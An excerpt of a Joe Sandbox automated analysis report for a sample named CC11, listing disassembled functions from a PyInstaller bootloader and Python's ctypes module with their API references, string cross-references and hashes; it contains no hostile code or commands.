Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$CharStringUnicode_Wide$DeallocFormat
String ID: can't delete attribute$string too long$unicode string expected instead of %s instance
API String ID: 1407654538-1577475929
Opcode ID: 9bc8028b2fc0058224e388ff4d436136f2b49ea49f03b5c1889dff7a5873b68a
Instruction ID: 39dc8c46a1e687e38401110b09d1f50072912a65fc79e0433e6f401ae039af40
Opcode Fuzzy Hash: 9bc8028b2fc0058224e388ff4d436136f2b49ea49f03b5c1889dff7a5873b68a
Instruction Fuzzy Hash: 6A314C61B09A4681EB109F9EE8801BA7760FB84FE4F149636DB2D47BA9DF3CE445C740

Function 00007FF8BFB7E8C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON38 ref: 00007FF8BFB7E908
PyUnicode_AsWideCharString.PYTHON38 ref: 00007FF8BFB7E91D
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7E948
PyMem_Free.PYTHON38 ref: 00007FF8BFB7E951
SysAllocStringLen.OLEAUT32 ref: 00007FF8BFB7E95E
PyMem_Free.PYTHON38 ref: 00007FF8BFB7E96A
SysFreeString.OLEAUT32 ref: 00007FF8BFB7E97C

Strings

String too long for BSTR, xrefs: 00007FF8BFB7E93E
unicode string expected instead of %s instance, xrefs: 00007FF8BFB7E8FA

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: String$Free$Err_Mem_$AllocCharFormatUnicode_Wide
String ID: String too long for BSTR$unicode string expected instead of %s instance
API String ID: 920172908-178309214
Opcode ID: 4149c1a81c04bdb3fdc818633bc0b3cb66efdfdd670b271a8ed2ce78be49526d
Instruction ID: 4b5324d77e8f56e985c4af0e86cc2dda57dbd9ac910277eed4f750e025a6ba68
Opcode Fuzzy Hash: 4149c1a81c04bdb3fdc818633bc0b3cb66efdfdd670b271a8ed2ce78be49526d
Instruction Fuzzy Hash: F721F326A1AA4681EA94CFDAE8540782760FFC8BD0F544036EB4E87765DE3CE498C301

Function 00007FF8BFB7A2D0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A2FB
PyErr_Format.PYTHON38 ref: 00007FF8BFB7A32F
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A355
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7A364
memcpy.VCRUNTIME140 ref: 00007FF8BFB7A377
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7A393

Strings

bytes expected instead of %s instance, xrefs: 00007FF8BFB7A321
byte string too long, xrefs: 00007FF8BFB7A34B
can't delete attribute, xrefs: 00007FF8BFB7A2F1

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$DeallocString$Formatmemcpy
String ID: byte string too long$bytes expected instead of %s instance$can't delete attribute
API String ID: 1948958528-1866040848
Opcode ID: 0089817566cd73aeb9c57cc19a0e3cf605cb8c4e165fe2323640650f8db5ae90
Instruction ID: 0b4ba0c1f71c568ae2da59748167b1e2c025f755f6426a31e1424f6942f9d65f
Opcode Fuzzy Hash: 0089817566cd73aeb9c57cc19a0e3cf605cb8c4e165fe2323640650f8db5ae90
Instruction Fuzzy Hash: A1213771A08A4281EB909FAEE8801BDB7A5FB85FD8F105132DB1E47A65DF3CE485C300

Function 00007FF6900255A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900255E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900259D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF690025C6C

Strings

:, xrefs: 00007FF69002579C
f, xrefs: 00007FF690025705
p, xrefs: 00007FF69002570D
-, xrefs: 00007FF690025679
p, xrefs: 00007FF690025695

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction ID: 3d5f9ccb389d88129d6bb2f97625036bd48733d362898b3ed4318b1cd36e3df2
Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction Fuzzy Hash: 42129061E0C243A6FB319A3DE1542797691FB40752F944176E689C7BCCEF3CE9828B08

Function 00007FF6900202E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690020328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900206F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002098F

Strings

f, xrefs: 00007FF69002042A
p, xrefs: 00007FF6900203CD
f, xrefs: 00007FF6900203C0
f, xrefs: 00007FF690020575
p, xrefs: 00007FF690020432

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction ID: 0a7f252f09a8ebe5459d82713e5bfd62826b94b451eaf8231740437f5ab60462
Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction Fuzzy Hash: E312A572E0C343A6FB309A28E05477A7251FB80754F844076E69A877CEDF7CE5A68B50

Function 00007FF8BFB71E0C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

PyLong_AsVoidPtr.PYTHON38 ref: 00007FF8BFB71E9F

Part of subcall function 00007FF8BFB72010: _PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB7204C
Part of subcall function 00007FF8BFB72010: PySequence_Tuple.PYTHON38 ref: 00007FF8BFB7206F
Part of subcall function 00007FF8BFB72010: _PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB720A0
Part of subcall function 00007FF8BFB72010: PySys_Audit.PYTHON38 ref: 00007FF8BFB720D1
Part of subcall function 00007FF8BFB72010: PyObject_GetAttrString.PYTHON38 ref: 00007FF8BFB720EA
Part of subcall function 00007FF8BFB72010: PyLong_AsVoidPtr.PYTHON38 ref: 00007FF8BFB72113
Part of subcall function 00007FF8BFB72010: PyErr_Occurred.PYTHON38 ref: 00007FF8BFB72126

Strings

argument must be callable or integer function address, xrefs: 00007FF8BFB77447
cannot construct instance of this class: no argtypes, xrefs: 00007FF8BFB77515

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Arg_Long_ParseSizeTuple_Void$AttrAuditErr_Object_OccurredSequence_StringSys_Tuple
String ID: argument must be callable or integer function address$cannot construct instance of this class: no argtypes
API String ID: 4181388754-2742191083
Opcode ID: 95199a011234cc55058fc8dd18c5086f66689566921fae72a51de8fa4d81df3f
Instruction ID: aab5f95ceb0ec556e4aa865b253e496b43499783934de60e94251d5fdea2ec0d
Opcode Fuzzy Hash: 95199a011234cc55058fc8dd18c5086f66689566921fae72a51de8fa4d81df3f
Instruction Fuzzy Hash: 81513A61A09B4280EA649FAED8501796BA1FF85FC4F188435DF4E47B99DF2CE451C350

Function 00007FF8BFB7BEEC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7BF7E

Strings

wrong type, xrefs: 00007FF8BFB7C0AD

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc
String ID: wrong type
API String ID: 3617616757-2191655096
Opcode ID: 0b4988f90789b608884a0820312154a766ff298a7a478ea2e6fe614ac435d5fe
Instruction ID: 0cad9f02691801400bcd75e6172d3e7b3581136e1c9949ab18bf30729801e771
Opcode Fuzzy Hash: 0b4988f90789b608884a0820312154a766ff298a7a478ea2e6fe614ac435d5fe
Instruction Fuzzy Hash: F5513C61A0AA4381FE549F9DD9501796BA2EF84BC0F588435DB0E4B7A9EF2CF894C740

Function 00007FF8BFB7C378 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7C40A

Strings

wrong type, xrefs: 00007FF8BFB7C539

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc
String ID: wrong type
API String ID: 3617616757-2191655096
Opcode ID: 145fd6ca234b13e2fd656f9f0c6ee79a1be4d5a2110f2a11c1c077804be63fb0
Instruction ID: 93c9d1d3a6e99351a01373163a48a219135711e3e8fde40955ad1a5fb65f231c
Opcode Fuzzy Hash: 145fd6ca234b13e2fd656f9f0c6ee79a1be4d5a2110f2a11c1c077804be63fb0
Instruction Fuzzy Hash: 325170A1A0AA4380FF549F9EE8411792BA5FF84BC4F588439DB0E477A1EF2CE854C300

Function 00007FF690011050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF6900111D7
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6900111D0
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6900110F5
fseek, xrefs: 00007FF6900110CC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF690011097
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6900110C5
malloc, xrefs: 00007FF6900110FC

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 750ca65755054052001ce73cd94522abe208fb5e67e319a3994d9d9bd6faa566
Instruction ID: 4ff96e2b5d55b41244753c365462c7c41f58a6b64fbfac0f938fdf32817bb11c
Opcode Fuzzy Hash: 750ca65755054052001ce73cd94522abe208fb5e67e319a3994d9d9bd6faa566
Instruction Fuzzy Hash: A6417E21B0864272EA759B36A8406FAA3A5FF44BCCF544071EE4D87B9DEE3CE5458700

Function 00007FF690017FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF6900139C0), ref: 00007FF69001800A
GetStartupInfoW.KERNEL32(?,00007FF6900139C0), ref: 00007FF69001802B

Part of subcall function 00007FF69002978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900297A0

Part of subcall function 00007FF690027A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690027A93

GetCommandLineW.KERNEL32(?,00007FF6900139C0), ref: 00007FF6900180CD
CreateProcessW.KERNEL32 ref: 00007FF69001810F
WaitForSingleObject.KERNEL32(?,00007FF6900139C0), ref: 00007FF690018123
GetExitCodeProcess.KERNEL32 ref: 00007FF690018133

Strings

CreateProcessW, xrefs: 00007FF690018146
Failed to create child process!, xrefs: 00007FF69001813F

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: 98b1619266e7276d40818b8af2a6d3fe626508889facaf9dce3d4a688e65152f
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 25411C32A18B8291DA309B34F4552AE73A1FBC9364F500375E6AD877D9DF7CD1458B40

Function 00007FF8BFB728C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

PyObject_CallObject.PYTHON38 ref: 00007FF8BFB728E6
PyMem_Malloc.PYTHON38 ref: 00007FF8BFB72908
PyDict_Update.PYTHON38 ref: 00007FF8BFB72978
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7299B
PyErr_NoMemory.PYTHON38 ref: 00007FF8BFB779EA

Strings

X{}, xrefs: 00007FF8BFB7292A

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: CallDeallocDict_Err_MallocMem_MemoryObjectObject_Update
String ID: X{}
API String ID: 3334104440-2140212134
Opcode ID: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
Instruction ID: 777695070a465879e8142fd289ac50bc93ef4738ae5d48bc954743cf291dd9e8
Opcode Fuzzy Hash: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
Instruction Fuzzy Hash: E9316D31A0DB8285EB558FA9E9542B87BA0EF89BD0F588530CB5E43B95DF3CE584C700

Function 00007FF8BFB79FC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

PyObject_IsInstance.PYTHON38(?,?,00000000,00007FF8BFB7727D), ref: 00007FF8BFB79FDB
PyObject_IsInstance.PYTHON38(?,?,00000000,00007FF8BFB7727D), ref: 00007FF8BFB7A023
PyErr_Format.PYTHON38(?,?,00000000,00007FF8BFB7727D), ref: 00007FF8BFB7A0BA

Strings

expected %s instance instead of %s, xrefs: 00007FF8BFB7A0A1
expected %s instance instead of pointer to %s, xrefs: 00007FF8BFB7A04C
???, xrefs: 00007FF8BFB7A045

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: InstanceObject_$Err_Format
String ID: ???$expected %s instance instead of %s$expected %s instance instead of pointer to %s
API String ID: 215623467-1082101171
Opcode ID: 7daf5171bb28265ae10482dd7f65e8456ce21089f6e24e5c542b3d35427a2017
Instruction ID: eae9dd88c0526ee0a2abe942c0bca89d2c7b3f3c0534c961a09a214b40d4e6d4
Opcode Fuzzy Hash: 7daf5171bb28265ae10482dd7f65e8456ce21089f6e24e5c542b3d35427a2017
Instruction Fuzzy Hash: 6B315A21A09A4381EA948FAAE4401B9A7A5FF88FD4F144532EF1E47BA5DF2CF845C340

Function 00007FF8BFB7A23C Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A25E
PyObject_GetBuffer.PYTHON38 ref: 00007FF8BFB7A274
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A29A
PyBuffer_Release.PYTHON38 ref: 00007FF8BFB7A2A5
memcpy.VCRUNTIME140 ref: 00007FF8BFB7A2B6
PyBuffer_Release.PYTHON38 ref: 00007FF8BFB7A2C0

Strings

byte string too long, xrefs: 00007FF8BFB7A290
cannot delete attribute, xrefs: 00007FF8BFB7A254

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Buffer_Err_ReleaseString$BufferObject_memcpy
String ID: byte string too long$cannot delete attribute
API String ID: 1128862751-688604938
Opcode ID: 865899bc16da5b7e00948234228a90162568b208c35d8bfa1d74ae81175d88b9
Instruction ID: 30309f05f6ebdcb279f0e96bad639b8c0f57db46c84a960412b0ef56de573119
Opcode Fuzzy Hash: 865899bc16da5b7e00948234228a90162568b208c35d8bfa1d74ae81175d88b9
Instruction Fuzzy Hash: E0011761A1AA4681EF50EFE9E8500B96360FFC4FD5B504232DA5E86AA5DE2DE544C700

Function 00007FF8BFB725E4 Relevance: 13.6, APIs: 9, Instructions: 91COMMON

Download Yara Rule

APIs

_PyDict_GetItemIdWithError.PYTHON38 ref: 00007FF8BFB72622
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB72631
PyDict_Update.PYTHON38 ref: 00007FF8BFB72662
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB72685
_PyDict_GetItemIdWithError.PYTHON38 ref: 00007FF8BFB726BE
_PyObject_SetAttrId.PYTHON38 ref: 00007FF8BFB726D6
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB726F7
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7785B

Part of subcall function 00007FF8BFB74E64: _PyObject_MakeTpCall.PYTHON38(?,?,?,00007FF8BFB713E9), ref: 00007FF8BFB74E83

_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77839

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: DeallocDict_$Err_ErrorItemObject_OccurredWith$AttrCallMakeUpdate
String ID:
API String ID: 3530831742-0
Opcode ID: e1901c3f67c9cc1b02f91d214b5f4b6f328cd1706827d80eeb8e9729a1f67c59
Instruction ID: 3e4ab3a65dd899695cc4e478583a6cad7a04189b68bf038cc4523808741369ea
Opcode Fuzzy Hash: e1901c3f67c9cc1b02f91d214b5f4b6f328cd1706827d80eeb8e9729a1f67c59
Instruction Fuzzy Hash: 19414C31E0AB4381EE589FAEED441B97BA0AF85BD4F284135CB5E467A5EF2CE444C700

Function 00007FF69001DD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF69001DD85

Part of subcall function 00007FF69001ECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF69001ED1F
Part of subcall function 00007FF69001ECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF69001ED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF69001DE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF69001E0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF69001E1B8

Strings

csm, xrefs: 00007FF69001DD9F
csm, xrefs: 00007FF69001DE06
csm, xrefs: 00007FF69001DE80

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction ID: 7b7fc0d14f23e5e8cbccf311bdbe500c2db0c24baa8cb43b77b5408f9667c13a
Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction Fuzzy Hash: 85D18032A08781A6EBB09B75D4403AD7BA4FB5978CF100176EE4D97B9ADF38E491C740

Function 00007FF690017C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF690013834), ref: 00007FF690017CE4
CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF690013834), ref: 00007FF690017D2C

Part of subcall function 00007FF690017E10: GetEnvironmentVariableW.KERNEL32(00007FF69001365F), ref: 00007FF690017E47
Part of subcall function 00007FF690017E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF690017E69

Part of subcall function 00007FF690027548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690027561

Part of subcall function 00007FF6900126C0: MessageBoxW.USER32 ref: 00007FF690012736

Strings

LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF690017D5E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF690017CBC
TMP, xrefs: 00007FF690017C7C, 00007FF690017D83
TMP, xrefs: 00007FF690017CA2
_MEI%d, xrefs: 00007FF690017CF2

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
